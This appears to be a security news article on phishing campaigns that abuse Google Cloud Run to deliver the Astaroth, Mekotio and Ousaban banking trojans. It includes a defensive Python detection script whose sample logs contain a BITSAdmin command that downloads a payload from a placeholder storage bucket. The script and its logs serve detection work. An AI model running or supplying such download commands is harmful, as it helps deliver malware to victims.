Google Cloud Run Exploited in Major Banking Trojan Offensive



Google Cloud Run, a service designed to streamline the deployment of both front and backend applications, is being abused by hackers to distribute banking trojans like Astaroth, Mekotio, and Ousaban, according to security experts. 

Cisco Talos has reported a sharp rise in the abuse of Google Cloud Run for distributing malware since September 2023. The service's low cost, and the fact that traffic to it often passes conventional security filters and blocklists unchallenged, have made it an attractive delivery platform for attackers.

Volume of Google Cloud Run-related phishing emails (source: Cisco)

Anatomy of the Cyber Attacks

The attack begins with carefully crafted phishing emails that masquerade as legitimate communications, such as invoices or official notifications from financial or government institutions. The emails are predominantly written in Spanish to target Latin American users, but Italian-language emails have also been observed, expanding the campaign's reach.

Sample of phishing email (source: Cisco)

Victims are lured into clicking links within these emails, redirecting them to malevolent web services hosted on Google Cloud Run. In several instances, these links further redirect victims to download malicious ZIP archives containing MSI installer files from Google Cloud Storage, serving as the primary vehicle for malware delivery.

Upon execution, these MSI files trigger the download and launch of additional malicious components, abusing legitimate Windows tools such as BITSAdmin for stealthy payload delivery. To persist on infected systems, the malware creates or modifies startup items so that it is relaunched after every reboot.
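The infection chain above gives defenders two concrete things to look for: a Cloud Run link that redirects to a ZIP on Google Cloud Storage, and BITSAdmin being used to pull a payload. The following detection logic, written as an added example for this article rather than anything published by Cisco Talos, runs both checks over constructed proxy and process-creation log lines; the log formats, hostnames, bucket names and file names are all hypothetical (Cloud Run services are assumed to be served from `*.run.app` and Cloud Storage objects from `storage.googleapis.com`).

```python
import re

# Constructed sample logs (not from the article). Hypothetical formats:
#   proxy:   <ts> <client_ip> <method> <url> <status> <location-header-or-"-">
#   process: <ts> <host> <parent_image> <image> <command_line>
PROXY_LOG = """\
2024-02-20T10:01:03Z 10.0.0.21 GET https://invoice-service-abc123-uc.a.run.app/factura 302 https://storage.googleapis.com/bucket-x/factura_2024.zip
2024-02-20T10:01:04Z 10.0.0.21 GET https://storage.googleapis.com/bucket-x/factura_2024.zip 200 -
2024-02-20T10:05:11Z 10.0.0.22 GET https://docs.example.com/report.pdf 200 -
2024-02-20T10:07:40Z 10.0.0.23 GET https://myapp-xyz-ew.a.run.app/api/health 200 -
"""
PROCESS_LOG = """\
2024-02-20T10:01:40Z WS21 msiexec.exe bitsadmin.exe bitsadmin /transfer job1 /download /priority high https://storage.googleapis.com/bucket-x/stage2.dll C:\\Users\\Public\\stage2.dll
2024-02-20T10:02:00Z WS22 explorer.exe notepad.exe notepad.exe C:\\notes.txt
2024-02-20T10:03:00Z WS25 svchost.exe bitsadmin.exe bitsadmin /list
"""

CLOUD_RUN_URL = re.compile(r"^https://[^/]+\.run\.app(/|$)", re.I)   # assumed Cloud Run hostname suffix
GCS_ARCHIVE = re.compile(r"^https://storage\.googleapis\.com/.+\.zip$", re.I)  # ZIP served from Cloud Storage


def find_redirect_lures(proxy_log):
    """Flag requests to a Cloud Run URL that answered with a 3xx pointing at a ZIP on Cloud Storage."""
    hits = []
    for line in proxy_log.splitlines():
        ts, client, _method, url, status, location = line.split(maxsplit=5)
        if CLOUD_RUN_URL.match(url) and status.startswith("3") and GCS_ARCHIVE.match(location):
            hits.append({"ts": ts, "client": client, "lure": url, "archive": location})
    return hits


def find_bitsadmin_downloads(process_log):
    """Flag bitsadmin.exe invoked with /transfer ... /download, recording which parent spawned it."""
    hits = []
    for line in process_log.splitlines():
        ts, host, parent, image, cmd = line.split(maxsplit=4)
        lowered = cmd.lower()
        if image.lower() == "bitsadmin.exe" and "/transfer" in lowered and "/download" in lowered:
            hits.append({"ts": ts, "host": host, "parent": parent, "cmd": cmd})
    return hits


if __name__ == "__main__":
    for hit in find_redirect_lures(PROXY_LOG) + find_bitsadmin_downloads(PROCESS_LOG):
        print(hit)
```

A BITSAdmin download whose parent is an installer process (here `msiexec.exe`) is the higher-confidence signal; the proxy check on its own will also surface benign Cloud Run apps, so the two should be correlated by client and time window before raising an alert.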

The Malicious Software in Focus

Here is a closer look at the trio of malware: 

  • Astaroth/Guildma: Initially focused on Brazil, this malware has broadened its scope, targeting over 300 financial entities across 15 Latin American countries. It is notorious for its advanced evasion techniques, credential theft, and cryptocurrency exchange infiltration.
  • Mekotio: This malware remains active predominantly in Latin America, specializing in banking credential theft, personal data exfiltration, and redirecting victims to phishing sites through browser manipulation.
  • Ousaban: Known for its keylogging and phishing capabilities, Ousaban often serves as a secondary payload in these attacks, hinting at collaboration between operators or a single actor orchestrating the distribution of multiple malware families.

Final Word

The exploitation of Google Cloud Run for the distribution of banking trojans represents a significant evolution in cybercriminal tactics, highlighting the need for continuous vigilance and advanced security measures to protect against these sophisticated threats. 

author: Anas Hasan

date: February 22, 2024

Anas Hassan is a tech geek and cybersecurity enthusiast. He has vast experience in the digital transformation industry. When Anas isn't blogging, he watches football games.
